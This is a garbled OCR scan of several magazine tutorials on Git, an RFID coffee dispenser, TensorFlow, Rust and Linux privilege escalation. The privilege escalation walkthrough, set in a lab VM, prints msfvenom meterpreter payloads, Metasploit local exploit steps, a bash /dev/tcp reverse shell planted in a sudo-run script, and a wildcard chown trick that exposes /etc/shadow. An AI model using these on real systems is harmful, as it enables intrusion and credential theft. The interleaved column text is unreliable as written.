The last thing we need to do is to click the green button information
marked ‘Clone or download’ and copy the URL that $ git status about the project
appears, as shown in Figure 1. This is the location of our such as its name,
repository online, and we will need it in order to clone the We should see the following output: a description
repository to our computer. and possible
On branch master installation
Clone and start the repository Your branch is up-to-date with 'origin/ and running
Open a command window, and navigate to the location master'. information.
where you want to clone the repository. It’s a good idea to Untracked files: Unlike a normal
create a new directory to hold all your Git projects. Once (use "git add <file>..." to include in text README,
inside that directory, type git clone and then paste in what will be committed) the file README.
the URL that you copied and press enter. For example: md supports
novel.txt Markdown
$ git clone https://github.com/My_Name/ formatting, so
collaborative-emma-novel.git This tells us that the new file, novel.txt, is not yet being we can make
tracked by Git. We remedy this situation by running the headings using
This will create a new directory with the same name as following command: # Heading,
the project. Navigate into it with cd. The directory we have bold text using
created is a local copy of the project living at GitHub. $ git add novel.txt **bold** and
com. At the moment, it appears to contain nothing but italics using
the README file, but if we run the command ls -a, we see If we run git status again, then we see that novel.txt *italics. This
that it also contains a directory called .git. This directory is now marked as a ‘new file’. formatted text
contains all the information about the project that Git The next step is to commit our changes. Committing is is what appears
needs to run – make sure you don’t delete it! When we something that we do periodically whenever we’ve made on the project’s
make changes in the local branch, they will not be pushed a fairly substantial number of changes. We cannot push home page.
to the server immediately. This is a good thing, because any modifications we have made to the online repository
www.linuxuser.co.uk 37
Tutorial Essential Linux: Git
before we have committed them, but we might want to $ git commit -a -m "Changed Emma’s age to
Gists commit multiple times before we push changes online. 17."
One thing you Committing requires us to add a message detailing what
might come the changes are, so it’s a good idea to commit at any The -a flag to git commit tells it to add all new changes
across if you point that we’ve made enough changes to warrant writing to the current commit. This saves us having to run git
use GitHub a such a message. add before running git commit as we did before. We can
lot are gists, This time, run the command: then run git push -u origin master again to push
normally hosted the changes online.
at gist.github. $ git commit -m 'Added the original text of The second author has decided to make some more
com. A gist is the novel.' drastic changes to the first paragraph. Inside the second
a particular local copy of the repository, open the file novel.txt and
type of GitHub to commit our most recent changes. If we run git replace the first paragraph with the following:
repository, status now, we see that novel.txt is no longer marked
normally as a new file, because it is part of the current commit. So okay, you’re probably thinking, “Whatever,
intended for However, we now get a message saying that we are ahead is this like a Noxema ad?” But I actually
sharing small of 'origin/master' by one commit. This is because have a bare normal life for a teenage girl.
snippets of we have performed a commit on the local branch, but
code with other have not yet pushed it to the server. Run git commit -a -m 'Changed the first
people, or Before we push any changes to the server, it’s a good paragraph.' in order to commit these changes.
storing them idea to run the following command: Before we try and push them to GitHub.com, let’s run
for your own the command git pull to fetch any new changes from
use. The benefit $ git pull the repository. When we run this command, we get the
of using a gist following error.
rather than a This command will fetch or ‘pull’ any changes that have
normal file- been made to the online branch. Had someone else CONFLICT (content): Merge conflicts in
storage service modified the online repository, we would want to fetch novel.txt
such as Pastebin their changes so that we could deal with any possible Automatic merge failed; fix conflicts and
is that, since a conflicts before pushing our version. In this case, since then commit the result.
gist is really a no one else is working on the repository, we should get
Git repository, the message Already up-to-date. We’re getting this message because our current commit
GitHub stores We can then run the following command to push our contains modifications that cannot be reconciled with
the full version changes to GitHub.com: the modifications that have been made to the master
history of code. branch since we last pulled the code from it. To get a
$ git push -u origin master better idea of what’s going on, let’s open the file novel.
txt in a text editor. When we open it and move to line
We’re prompted for our GitHub username and password; 48, we discover that Git has changed the file so that it
after we’ve given these, Git sends the new file. We can now displays the conflicts in such a way that we can
reload the page for our repository on GitHub.com and choose ourselves how to resolve them. Figure 2 shows
we should see that the new file novel.txt now appears the relevant part of the code. Wherever it finds a conflict
there alongside the README. between the two versions, Git has put
38
to handle the merge: Git cannot decide itself what the
Figure 2
best course of action is, so you should. You might want
to choose one or the other of the two passages, or you
could decide to incorporate changes from both – perhaps
by using the more modern introduction, but changing
the word ‘teenage’ to ‘17-year-old’. When you’ve finished
making your changes, save and close the file, and then
run a git commit command to commit the changes,
followed by git push -u origin master to push them
to the repository online.
Note that if we go back to the first local repository and
run git pull, Git will now fetch the new, merged version
from the server, and will not register a merge conflict,
even though the current contents of the branch conflict
with what is online. The reason is that the online branch
is now a ‘commit ahead’ of this local branch – that is, it’s
considered to be a more up-to-date version of what’s in
our first local branch.
Author: johngowers <[email protected]> Above Git has its
Using Git to undo changes Date: Wed Mar 21 19:49:46 2018 +0000 own special format
Now suppose that we wake up the next day and realise for displaying merge
that the new ‘modern’ opening paragraph doesn’t really Resolved merge conflict. conflicts concisely
within files. Some
The long hexadecimal code identifies this merge conflict. editors, such as Atom,
Sometimes when we In order to produce the commit that reverts it, we run the can recognise this,
following command – replace the hex code with the one and make it easy to
are working on a project corresponding to the merge conflict in your setup: choose one branch
or another
we end up making changes $ git revert -m 1
2e68c483abe7db1cd87627ed2092cd24b085f0e0
that we decide we don’t
Here, the -m 1 is specific to reverting a merge conflict
want (rather than some other commit). The number 1 refers
to which of the two conflicting branches should be
considered the main one. Git will pop up a text editor,
fit in with the rest of the novel. We want to return to a where we write our revert message, before saving and
previous version of the project. To do this, we should first exiting to trigger the reversion. Now, it’s time to revert the
run the following command. other two changes. We can do this with:
www.linuxuser.co.uk 39
Tutorial Arduino: Coffee Dispenser
part one
Python
40
for the FIFA World Cup, and in universities worldwide.
However, the encryption provided by some of these
cards – Crypto-1 – has been compromised, so cards
such as the Mifare Classic have fallen out of favour in
applications where security matters. Despite this, there
are quite a few still in use, and cards and reader kits that
can easily be used with an Arduino or Raspberry Pi can be
picked up online for a few pounds. Regardless of the card
your workplace uses, you can still read card IDs without
needing to decrypt the data.
www.linuxuser.co.uk 41
Tutorial Arduino: Coffee Dispenser
IDE under Sketch > Include library > Manage libraries. the card holder. With the Mifare Classic series of cards,
Using Search for ‘MFRC522’ and press Install; you can also do the data stored takes the format of header information,
Python this in the online editor using the Library Manager. followed by blocks of data, which in some cases can be
databases Open the example sketch ‘DumpInfo’ that comes with encrypted. If you plan to issue users with your own cards,
There are Python the library. This will be the skeleton around which you will you can make use of the other example sketches to write
libraries which write the sketch for the coffee pod dispenser. The sketch data to certain blocks on the card. You can encrypt them
enable you to begins by including the SPI and MFRC22 libraries and using the Crypto-1 algorithm built-in to the cards and
interface with defining the reset (RST_PIN) and slave select (SS_PIN) the Arduino library – although, as mentioned earlier, this
and manage pins. Modify the top of the sketch to match your setup; provides little security and is no longer used on newer
databases. don’t worry about the rest of the SPI pins – we’ve used Mifare card models.
These libraries the default configuration. The sketch then goes on to If you intend to use employee identification cards
act as drivers initialise an MFRC522 object using: for this system, as we will demonstrate, it will be much
for databases harder (and perhaps a bad idea) to write to blocks on
such as SQLite, MFRC522 mfrc522(SS_PIN, RST_PIN); the card. For one thing, you definitely don’t want to do
PostgreSQL and be overwriting information already present on the card
MySQL, and can and, in setup, begins connection to the RFID reader and – your employer might be a bit peeved if they catch you
therefore be requests information about the reader. In loop there are
manipulated in then two if conditions which return the program to the
a Python script. beginning of loop unless a new card is placed in front In order for the user to
This is a good of the reader, and the reader can establish a connection
route if a web with the card and read data from it. If data is read, the order a coffee, they’ll need
application is sketch finishes by executing:
suitable for to flash their RFID card in
managing your mfrc522.PICC_DumpToSerial(&(mfrc522.uid));
coffee club front of the reader
and letting new writing all card data to serial (your computer) and
users register. automatically terminating connection with the card.
Open the Serial Monitor from the Arduino IDE and ‘tampering’ with it! An easy way around this, although
scan a card in front of the reader – you can use the one not without its drawbacks, is to just read the unique
provided with the kit and then consider trying others. It identifier (UID) written to the card by the manufacturer.
should begin with a unique identifier, the card model, While this is a quick and dirty way of identifying the user,
and then lots of text, broken into blocks. This is the card it’s a bad idea if you care about security: it is possible to
data which can be used to store data, such as employee clone these cards and overwrite the UID field. In principle,
number or account balance. If your Arduino says that anyone could pretend to be someone else (if they know
authentication failed, your card is encrypted. a UID for members of your coffee club) and get a free
coffee from your machine – so that’d be no better than
Below Use a Identify the card an honesty jar.
breadboard to make In order for the user to order a coffee, they’ll need to However, if you’re reasonably confident that
wiring the RFID reader flash their RFID card in front of the reader, from which we employees’ cards will be protected by the user and
to the Arduino easier can extract information about the card – and therefore not left lying around, just grabbing the UID should be
sufficient. If you are still worried, you could always get
the user to input a PIN code before issuing a pod and
charging their account. Luckily for us, the MFRC522
object stores the UID separately as a byte array, so
we can access it using mfrc522.uid.uidByte – and
similarly for the size. If you would prefer the card ID in
hexadecimal, open the ReadNUID example and steal the
printHex function from the bottom. You can then call:
printHex(mfrc522.uid.uidByte, mfrc522.uid.size);
42
or not coffee should be served to a user. The aim of the
rest of this tutorial is to establish whether or not a user
is a member of the club, if they have enough money
associated with their ID, and then, if the user orders a
coffee, to subtract a preset amount of money after the
pod has been dispensed. Instinctively, one might consider
using a database to manage users and their accounts,
and languages such as Python – which, as we’ve seen
in previous tutorials, can also be used to communicate
easily with the Arduino – have ways of doing this. Python
can even be integrated with a MySQL database, which
enables us to create a website where a user or manager
can manage an account. If this is something that
interests you, we recommend you go for it, but it’s a little
outside the scope of this tutorial.
Connect a Raspberry Pi to the Arduino Mega by USB;
an adaptor might be required to convert to Micro-USB. On
the Pi Zero W, we use the adaptor to connect to the USB
terminal, and power both the Raspberry Pi and Arduino
through the Pi’s Power USB port. We chose the Pi Zero W
as it’s low-cost and has built-in Wi-Fi, thus enabling us to When a user swipes their card in front of the reader, Above Connecting
log in remotely. the Pi receives a UID as a string. The Pi can then hash the the Arduino to the Pi
UID and check the Python dictionary to see if that string may require a USB
Check against known users exists. If the ID doesn’t exist, the script can then create a adaptor, depending
We can now begin creating our pseudo-database of file, using the hashed ID as the filename, which the user on the model
coffee club members and adding money to accounts. can then manually open to enter their name.
As stated before, this isn’t the most effective way of Each time the Pi boots up, it can form the dictionary
managing the club, but all we now need to do is to create from this folder of hashed UIDs, mapping the UID to the
a dedicated folder where we can store user accounts. contents of its file – the name of the card holder. If a
Each time an RFID card is swiped against the reader, the hashed UID is found to already exist in the dictionary, the
script can use the mapping to convert to a username,
open their account file – created when the user registers
When the Pi boots up, it – and find out how much money they have in their
account. If they have money on their account, the Pi can
can form a dictionary from tell the Arduino to dispense a coffee pod.
www.linuxuser.co.uk 43
Tutorial Computer Security
Security: Privilege
escalation techniques
Learn how attackers may gain root access by exploiting
Toni
Castillo misconfigured services, kernel bugs and more
Girona So far our tutorials in this series have been dealing and sometimes they may even crash it. Without further
with different techniques to find and exploit well- ado, are you ready to delve into the passionate world of
Toni holds known vulnerabilities in order to get a foothold into a privilege escalation techniques? Read on!
a degree in system. Most of the time, however, that initial foothold
Software won’t get you a root shell. That’s because some of these Get root through Ring 0
Engineering and a services may run using a non-privileged user account We’ve already mentioned that getting root by exploiting
MSc in Computer (for example, Apache’s ‘www-data’ user). As a pen-tester, a kernel flaw is dangerous, so now it’s time for a
Security and your next step is obvious: to escalate privileges, or priv demonstration. Download Ubuntu 16.04-4 LTS from
works as an ICT esc. To some, priv esc is kind of an art, and we agree. http://releases.ubuntu.com and install it on a VM
research support Whatever your thoughts about it, priv esc can be achieved with at least two CPUs. Add a new ‘Host Only’ network
expert in a public by abusing misconfigured services, exploiting vulnerable device to be able to communicate with the VM directly
university in programs, taking advantage of kernel bugs, or performing (for VirtualBox, see http://bit.ly/lud_vb). Don’t tick the
Catalonia (Spain). social engineering attacks. There are some tools that ‘Download updates while installing Ubuntu’ option. Boot
Read his blog at will assist you throughout this process (see Resources). it up and install a vulnerable kernel: apt-get install
http://disbauxes. Metasploit framework, for instance, ships with a bunch linux-image-4.4.0-62-generic. This kernel version is
upc.es of local exploits for some well-known vulnerable known to have a ‘Use-After-Free’ flaw (see http://bit.
programs (see modules/exploits/linux/local). ly/lud_flaw). Now reboot into this new kernel – press
Resources Sometimes it’s tempting to execute a local kernel exploit Shift during the booting process to access the GRUB
to get root, but we strongly discourage you to do so menu. Don’t install any updates. If you were an attacker
Post exploitation because these exploits tend to make the system unstable already connected to this machine as a non-privileged
repository
http://bit.ly/
lud_postexp
Metasploit local
exploit suggester
http://bit.ly/
lud_suggest
LinEnum
http://bit.ly/
lud_linenum
Linux exploit
suggester
http://bit.ly/
lud_suggest2
Exploit database
http://bit.ly/
lud_exploit
Vulners scanner
http://bit.ly/
lud_vulners
Lynis
https://cisofy.com Above Get used to auditing your own computers before someone else does (uninvited, that is!)
44
user, you would be looking for possible priv esc vectors. Left Identifying priv
Figure 1
You will be that attacker now; install Metasploit on your esc vectors won’t
computer (see http://bit.ly/lud_nightly) and generate a always be that easy –
Meterpreter payload for Linux x64: msfvenom -p linux/ and that’s a relief
x64/meterpreter_reverse_tcp LHOST=<YOURIP>
LPORT=4444 -f elf -o m.e. Upload this file to your
VM, using SSH for example, set its execute bit and run
it: chmod +x m.e; ./m.e&. On your computer, start
msfconsole with a new handler to deal with remote
sessions by typing this one-liner:
www.linuxuser.co.uk 45
Tutorial Computer Security
a list of GNU/Linux local exploits by executing ls -l apache2 libapache2-mod-php. Next, create the
Privilege /opt/metasploit-framework/embedded/framework/ .scripts directory in /var/www/html with: mkdir /var/
escalation modules/exploits/linux/local/. As you can see, there’s www/html/.scripts. Add the following lines to the /etc/
in Windows a working exploit for ntfs-3g. Use this module, set its apache2/sites-available/000-default.conf file:
Eleven Paths payload (a stageless meterpreter reverse TCP payload
has developed will do), your IP and a new listening port (remember that <DirectoryMatch "^\.|\/\.">
a Python the VM is still connected to your port 4444/tcp): Order allow,deny
framework for Deny from all
attacking and use exploit/linux/local/ntfs3g_priv_esc </DirectoryMatch>
mitigating all set PAYLOAD linux/x64/meterpreter_reverse_tcp
the well-known set LHOST <YOURIP> Restart Apache: /etc/init.d/apache2 restart. Now
techniques to set LPORT 4445 create a new file called purge.sh:
bypass Windows
UAC, called Because this is a local exploit, it requires an already #!/bin/bash
Uac-A-Mola established session. Use the SESSION_ID of your current rm -rf /tmp/*
(see https:// meterpreter session: set SESSION <ID>. This module
github.com/ will upload some files to the target computer and it will Save this file to /var/www/html/.scripts/ and set its
ElevenPaths/ compile the exploit right there, so make sure you set execute bit: chmod +x purge.sh. Finally, make sure
uac-a-mola). a valid working directory with write permissions: set to set www-data as the owner of /var/www/html with:
This framework WritableDir /home/<USER>, where <USER> is the user chown -R www-data:www-data /var/www/html. Add the
implements you are logged in as. Now, before executing the exploit, following entry to /etc/sudoers: www-data ALL=(ALL)
the techniques make sure to check if the target is vulnerable: check. NOPASSWD: /var/www/html/.scripts/purge.sh. This
known to date: Finally, execute the exploit in order to get root: exploit. script will be executed by www-data at some point. No
DLL hijacking, You will see a new reverse TCP session being established one is supposed to run this command directly from
CompMgmt to your computer and msfconsole will start interacting the website, of course, thanks to the <DirectoryMatch>
Launcher.exe, directive. On your computer, kill any established
Eventvwr.exe meterpreter session: sessions -K. Then kill all your
and fodhelper. Kernel exploits tend to listeners too: jobs -K.
UAC exploitation Now, let’s imagine you are an attacker who has been
aside, the same make the system unstable able to exploit a flaw on the website and you have gained
principles as a non-privileged PHP meterpreter session. Generate
with GNU/Linux and sometimes they may a new payload now: msfvenom -p php/meterpreter/
distros apply reverse_tcp LHOST=<YOURIP> LPORT=4444 -o m.php.
here as well. even crash it Upload this file to the VM and save it to /var/www/html/.
On your computer, change the payload used by the
multi/handler listener accordingly: use exploit/multi/
with it right away. Check if you are root now: getuid handler; set PAYLOAD php/meterpreter/reverse_tcp.
(see Figure 2). You can use vulners-scanner too (see Now run the module: run -j. Use your favourite browser
Resources) and execute it directly on the target machine. to access the payload just uploaded by navigating to
You can do this from your non-privileged meterpreter http://YOURVMIP/m.php. You will get a meterpreter
session. Background your current privileged session now: session with the same privileges as www-data.
background. Get back to your previous non-privileged Interact with this session and spawn a new shell (use
meterpreter session: session -i <ID>. Now spawn a the Python trick again) to run the command sudo -l;
new shell and download vulners-scanner: wget https:// this will list the allowed sudo commands for www-data.
github.com/vulnersCom/vulners-scanner/archive/ See? You now know that you can run the purge.sh script
master.zip. Unzip it and execute it: unzip master.zip; without a password! It so happens that this script is
cd vulners-scanner-master; ./linuxScanner.py. You
will get the same list of vulnerable packages as with the Figure 2
web front-end.
46
owned by www-data, so it’s a piece of cake to
add something more interesting than just rm
You know what wildcards are; you probably
use them on a regular basis. Most of us do. what next?
-rf to it; terminate this channel with Ctrl+C When used loosely, bad things can happen.
and use the edit command to edit this file: As a matter of fact, things can turn wild (see Dissect malicious
edit .scripts/purge.sh. Now add the http://bit.ly/lud_privesc). So let’s imagine
following lines to the file (replace <YOURIP> that a sysadmin has created the following Windows binaries
with your IP Address): shell script:
with Any.Run
/bin/bash -c /bin/bash -i > /dev/
tcp/<YOURIP>/4445 0<&1 2>&1 &
#!/bin/bash
cd /var/www/html && chown www- 1 Create your account
disown $! data:www-data *
exit $? Visit https://app.any.run/#register and
Save it (:wq!). Background this session and create a new account, with any email
start a new listener using the reverse shell Save this file to /usr/local/bin/update- address you like. Using the free plan only
payload: background; set PAYLOAD linux/ web-owners.sh on your VM. Set its execute gives you access to a Windows 7
x64/shell_reverse_tcp; set LPORT bit: chmod +x /usr/local/bin/update- 32-bit sandbox.
4445. Execute it: run -j. Now get back to web-owners.sh.
your non-privileged session: sessions -i
<ID>. Spawn a new shell (don’t forget to use Get root through wildcards
2 Upload your malicious
Python again!) and run the script via sudo: This script has been added to cron to be
binary to the sandbox
sudo /var/www/.scripts/purge.sh. A new executed every five minutes as root; add the
reverse-TCP session will be established; kill following line to /etc/crontab on your VM: Grab your malicious program and send
this channel (Ctrl+C) and background the it to the sandbox. You can use the New
current session: background. Finally, interact */5 * * * * root /usr/local/ Task icon on the left (+) to upload a local
with the new session just established: bin/update-web-owners.sh file, or you can paste an URL holding the
sessions -i <ID>. Run the id command; binary. Only files up to 16MB are allowed.
you are root now!
You can use LinEnum to help find
Get back to your computer and, from a
non-privileged meterpreter session, create 3 Let it run
security weaknesses in a system such as a new file called ref.php (don’t forget to
misconfigured files. It’s an standalone bash spawn a shell first): touch ref.php. This Wait for a while until the sandbox is
script that you can upload to your target file will be created with www-data as its ready. The system will start gathering
computer using a non-privileged session and owner, of course. Open a new terminal on some useful information about the
run it. It will check for sudo access without a your computer, execute vi and save the program: network connections, registry
password, locate setuid/setgid binaries, and new empty file (:w --reference=ref. changes, malicious behaviour, and so on.
so on (see Resources). php). Then upload this file to the VM using You are free to interact with the system
Get back to your non-privileged session, your meterpreter session (first terminate at any time.
spawn a new shell and download LinEnum. the active channel with Ctrl+C): upload
sh: cd .scripts; wget https://raw. --reference=ref.php. Spawn a new shell
githubusercontent.com/rebootuser/ once again and make a symbolic link to /etc/
LinEnum/master/LinEnum.sh. Set its execute shadow: ln -s /etc/shadow shadow. Wait
bit: chmod +x LinEnum.sh. for a while until the cron job executes. Have
Finally, run it and pipe its output to a file: a good look at /etc/shadow now… and start
panicking! Now /etc/shadow is
www.linuxuser.co.uk 47
Tutorial TensorFlow: Image Recognition
import tensorflow as tf
hello_test = tf.constant('Hello from
TensorFlow!')
sess = tf.Session()
print(sess.run(hello_test))
48
need to be applied to the data. All these processes and hidden Left A neural network
relationships are combined to define a dataflow graph. consists of an input
TensorFlow then acts as the engine that traverses these input layer, a number of
graphs and executes all the operations that have been intermediate layers,
defined. These features are accessible through the and an output layer
low-level API in TensorFlow, but most people don’t need output
to work with that much detail, so there is a higher-level
API that provides data import functions to manage
creation of the data structures from many common data
file formats. Then there are a series of functions called
estimators. These estimators create entire models, and
their underlying graphs, so that you can simply run the
estimator to do the data processing that is needed.
Inception-v3
One of the tasks for which TensorFlow has shown its
usefulness is image recognition, and therefore a lot of
work has been done to improve its performance in this
area. When you start developing your own algorithms, the
work done in the image-recognition estimators would be
well worth your time to investigate. One family of image
recognition estimators is called Inception, with the most
current release being version 3.
The Inception models were trained using a data data. If you have already downloaded the model, you can
set called ImageNet, put together in 2012 to act as a indicate this to the script with the command line option
standard set to test and compare image-recognition --model_dir to specify the directory where it’s stored.
Then to have it classify your own images, you can hand
them in with the command line option --image_file.
When you start To test it, you can use the default image of a panda. When
you run it, you should get output like the following. Visualising
developing your own models with
python ./classify_image.py TensorBoard
algorithms, the work giant panda, panda, panda bear, coon bear, When working
Ailuropoda melanoleuca (score = 0.89107) with networks
done in image-recognition indri, indris, Indri indri, Indri and models,
brevicaudatus (score = 0.00779) it can become
estimators would be worth lesser panda, red panda, panda, bear cat, difficult to
cat bear, Ailurus fulgens (score = 0.00296) figure out what
your time to investigate custard apple (score = 0.00147) is actually
earthstar (score = 0.00117) happening.
To help, the
systems. It contains more than 14 million URLs to As you can see, this outputs the top five matches for developers
images that were annotated (by humans) to indicate what TensorFlow thinks your image might be, together have provided
the objects pictured; there are more than 20 thousand with a confidence score (in case you were wondering, a tool called
ambiguous categories, with each category, such as ‘roof’ an earthstar is a type of fungus!). If you want, you TensorBoard to
or ‘mushroom’, containing several hundred images. can change the number of returned matches with the help visualise the
Luckily, Inception-v3 is a fully trained model that you command line option --num_top_predictions. learning that is
can download and use to experiment with. Once you being processed.
have TensorFlow installed, download Inception from the Tune the net In order to use
GitHub repository with the following commands: While the Inception model is very good, it’s designed to it, you need
be as general as possible and to be able to identify a wide to have your
git clone https://github.com/tensorflow/ range of categories. But you may want to tune the model code generate
models.git to be even better at identifying some smaller subset of summary data,
cd models/tutorials/image/imagenet types of images. In these cases, you can reuse the bulk which can then
of the Inception model and just replace the last layer be read by
In this folder, you’ll find the Python script classify_ of the neural network to be specific for your new image TensorBoard and
image.py. Assuming you haven’t run this script category. In the main TensorFlow GitHub repository that produce detailed
before, and haven’t downloaded the model data at you need to download, there is a Python script that gives information for
some other time, it will start by downloading the file an example of how to retrain the inception model, which you model.
inception-2015-12-05.tgz so that it has the model you can run with the following example code.
www.linuxuser.co.uk 49
Tutorial TensorFlow: Image Recognition
python tensorflow/examples/image_retraining/ then train a new final layer, which can be quite tedious
Using retrain.py --image_dir ~/my_images to carry out – but you can shorten the process by using
TensorFlow a useful wrapper known as TF-Slim. As you can see,
Mobile This script takes all of the images in the directory we have only touched the code necessary in the most
When you have my_images and retrains the model using each image. cursory way in the material above. We haven’t had the
a model trained This simple a retraining process can still take 30 minutes space available to dig into much of the detail that you
and are using it or more. If you were to do a full training of the model, it require in order to get any work done, and indeed this is
in some project, could take a huge number of hours. There are several a well-known complaint people have with TensorFlow.
you have the other options available, including selecting a different
ability to move model to act as a starting point. There are other smaller
it onto what models that are faster, but not as general. If you’re With the TF-Slim
may seem like writing a program to be run on a low-power processor,
underpowered such as a phone app, you may decide to select one of module loaded, a lot of the
hardware these instead.
by using the boilerplate code that needs
Tensorflow Training on new data
Mobile libraries While the above example may be fine for the majority of to be written when working
available at the people, there may be cases where you need more control
TensorFlow site. than this. Fortunately, you can manually manage the in TensorFlow is wrapped
This can move retraining of your model. The first step is to load the data
very intensive for the model; the following code lets you do this. and taken care of for you
deep-learning
applications out graph = tf.Graph() To help alleviate this issue you can use that wrapper
to devices such with graph.as_default(): layer of code, TF-Slim, to minimise the amount of code
as smartphones with tf.gfile.FastGFile('classify_image_ that you need in order to get some useful work done.
or tablets. graph_def.pb', 'rb') as file: TF-Slim is available in the contrib portion of the
graph_def = tf.GraphDef() TensorFlow installed package, and you can import it with
graph_def.ParseFromString(file.read()) the following code:
tf.import_graph_def(graph_def, name='')
import tensorflow.contrib.slim as slim
This loads the model and creates a new graph object. The
graph is made up of several layers, all leading to a final With the TF-Slim module loaded, a lot of the boilerplate
output layer. code that needs to be written when working in
TensorFlow is wrapped and taken care of for you.
last_layer = graph.get_tensor_by In TF-Slim, models are defined by a combination of
name('pool_3:0') variables, layers and scopes. In regular TensorFlow,
Below There’s a creation of variables requires quite a bit of initialisation
complete tutorial This final layer is what does the final classification and on whichever device the data is being stored and used on.
available as an IPython makes the ultimate decision as to what it thinks your TF-Slim wraps all of this so that it’s simplified to become
notebook in the image is. At this point, you can process your specialised a single function call. For example, the following code
models repository for images to create a new final layer. There are several creates a regular variable containing a series of zeroes.
TensorFlow steps required in order to preprocess the images, and
my_var = slim.variable('my_var', shape=[20, 1],
initializer=tf.zeros_initializer())
regular_variables_and_model_variables =
slim.get_variables()
input = ...
net = slim.conv2d(input, 128, [3, 3],
scope='conv1_1')
50
TF-Slim also includes 13 other built-in options for
layers, including fully connected and unit norm layers. Canned Estimators Models in a box
It even simplifies creating multiple layers with a repeat
function. For example, the following code creates three
convolutional layers.
Estimator Keras Train and evaluate models
net = slim.repeat(net, 3, slim.conv2d, 256, Model
[3, 3], scope='conv3')
Build models
This makes the task of retraining a given model to Layers
be more finely tuned much easier. You can use these
wrapper functions to create a new layer with only a few
lines of code and replace the final layer of an already built
model. Luckily, there is a very good example of how you Python Front-end C++
Front-end ...
can do this, which is available within the models section
of the TensorFlow source repository at GitHub. There is a
complete set of Python scripts written to help with each
of the steps we’ve already discussed. There are scripts
to manage converting image data to the TensorFlow TensorFlow Distributed Execution Engine
TFRecord data format, as well as scripts to automate the
retraining of image recognition models. There is even an
IPython notebook, called slim_walkthrough.ipynb, that
takes you through the creation of a new neural network, CPU GPU Android iOS ...
training it on a given dataset, and the final application of
the neural network on production data.
Training a new layer exploding in popularity recently. There is still one area Above Tensorflow has
Once you have a new layer constructed, or perhaps that has performance problems, however: the training a layered structure,
you have created an entirely new neural network from of the models in the first place. For example, training building up from a
scratch, you still have to train this new layer. In order to the Inception image-recognition model takes weeks of core graph execution
retrain a given network, you need to create a starting processing time. This is why quite a bit of development engine all the way
point with the following code. time has been put into including GPU support for this up to high-level
stage of TensorFlow usage – and it’s also why you estimators
model_path = '/path/to/pre_trained_on_ should use a pre-trained model, such as the Inception
imagenet.checkpoint' model we’ve been discussing, whenever you have the
variables_to_restore = slim.get_variables_to_ opportunity.
restore(...) The Inception-V3 model took weeks to train, even with
init_fn = assign_from_checkpoint_fn(model_ 50 GPUs crunching the network data. When you are doing
path, variables_to_restore) your own training, there are few things you can do to help
with performance. One of them is to try to bundle your
Once you have this starting point, you can start the file I/O into larger chunks. Accessing the hard drive is one
retraining with the code below. of the slowest processes on a computer; if you can take
multiple files and combine them into larger collections,
train_op = slim.learning.create_train_op(...) reading them is made more efficient. The second option
log_dir = '/path/to/my_model_dir/' you have is to use fused operations in the actual training
slim.learning.train(train_op, log_dir, init_ step. This takes multiple processing operations and
fn=init_fn) combines them into single fused operations, to minimise
function-call overhead.
You can then run this newly created model to get it to
do actual work. To help, the TF-Slim code repository Where next?
includes a script called evaluation.py to help you do this We’ve only been able to cover the process of image
processing step. If you have something specific that you recognition and retraining of neural networks in the most
need to do, you can use this script as a starting point to superficial way in this tutorial. There are a large number
write your own workflow scripts. of complicated steps involved in working with these types
of models.
Performance implications My hope is that this short article has been able to
The developers behind TensorFlow have put a lot of highlight the overall concepts, and includes enough
work into making the final, trained models fairly snappy external resources to help point you to sources of the
in terms of performance. This is one of the reasons details you would need to be able to add this functionality
why deep learning and neural networks have been to your own projects.
www.linuxuser.co.uk 51
Tutorial Introduction to Rust
Rust: An introduction to
safe systems programming
Learn some of the safety features inside one of
John
Gowers the best-loved programming languages today
John is a
university tutor
in Programming
and Computer
Science. He likes
to install Linux
on every device
he can get his
hands on and
has extensive
programming
experience.
Resources
Rust and Cargo
Installation (details
are included in
the article)
Above If you’re familiar with C, it shouldn’t take long to get to grips with Rust
Rust, in a nutshell, is a safe C. Developed in the last hope that you’ll gain some appreciation of what Rust
10-12 years under the sponsorship of Mozilla, it quickly does and how it can help us catch bugs much earlier than
took on a number of safety features that are directly other languages.
useful within software engineering projects. At its To start, we need to install the Rust compiler to our
heart, it’s a systems programming language just as system. In order to download it manually, you can visit
C is, but it combines low-level access to the machine with https://sh.rustup.rs, which will automatically download
elegant features, such as strong typing and ownership, a shell script, rustup-init.sh. Running this script will
that help Rust programmers avoid bugs and memory install Rust on your system. You can perform installation
leaks much more effectively than they could in C – or in a single command as follows:
in similar languages such as C++.
Today, Rust is hugely popular, owing to its elegance $ curl https://sh.rustup.rs/ | sh
and robustness. In fact, it was named the most-loved
language in the Stack Overflow developer survey in Alternatively, your distribution’s package manager might
2016, 2017 and 2018. have a Rust package on it already. If that’s the case, it’s a
good idea to install Rust using it. This will give you a more
Getting started robust installation, and will help you keep track of Rust
We’ll assume that you know a bit about systems on your system. We’ll start with a simple “Hello world”
programming in C/C++. Much of the syntax of Rust is program. Open a command window, create a folder
the same as that of C; where there are differences, they somewhere on your system in order to hold the code,
are for the purpose of making the language safer and and navigate to it. We’ll also need to fire up a text editor
less prone to error than C, directly targeting common to write our code. Create a file called hello.rs inside the
problems such as null pointers and memory leaks. We folder we’ve just created, and add the following code to it.
52
fn main() { number data types Figure 1 Left Rust provides
println!("Hello, world!"); good support for many
} Size Signed type Unsigned type different integer and
floating point types,
If you’re used to C you’ll notice some similarities, but a 8 bit integer i8 u8 so you are never left
number of differences as well. To start, notice that the guessing about how
function that runs when the program starts is called 16 bit integer i16 u16 many bits your data
main, as it is in C, and that the syntax is broadly the same. takes up
Some differences include the keyword fn to declare a 32 bit integer i32 u32
function (which is not part of C) and the exclamation mark
! after the function println. This exclamation mark in 64 bit integer i64 u64
fact means that println is not a normal function but a
macro, but we don’t need to worry about that for now. 64bit / 32bit int
Go into the command window, and type the following (platform int isize usize
to compile your program. size)
$ ./hello
Hello, world! int x = 'A' * 'B' / 'C';
printf("%c\n", x);
Package management with Cargo
Almost all Rust projects use the special built-in package- Multiplying and dividing characters shouldn’t make
management system called Cargo. If you installed Rust sense, and neither should putting them into integer
using the installation script, it will already be installed. values. Weak typing is sometimes useful, but on the
